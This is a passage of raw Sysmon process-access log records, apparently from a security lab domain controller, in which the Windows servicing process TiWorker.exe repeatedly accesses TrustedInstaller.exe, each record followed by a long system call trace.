1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.951{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.951{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.935{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.935{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.935{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.935{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.935{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.935{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.920{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.920{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.920{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.920{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.920{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.904{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.904{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.904{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.888{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.888{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 